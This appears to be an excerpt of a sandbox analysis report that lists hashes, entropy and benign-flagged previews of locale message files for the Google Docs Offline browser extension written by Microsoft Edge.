                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                        Malicious:false
